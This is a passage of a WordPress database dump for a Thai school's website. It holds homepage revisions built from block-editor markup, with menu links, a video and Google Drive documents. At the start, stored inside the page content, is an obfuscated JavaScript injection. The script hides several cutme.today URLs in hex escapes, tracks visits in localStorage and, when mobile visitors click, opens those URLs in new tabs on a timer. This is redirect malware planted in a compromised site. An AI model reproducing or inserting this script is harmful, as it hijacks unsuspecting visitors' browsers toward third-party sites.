_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 12:01:01','2024-08-27 05:01:01','',19,'http://watprato.ssk.in.th/?p=226',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(228,2,'2024-08-27 12:17:35','2024-08-27 05:17:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" 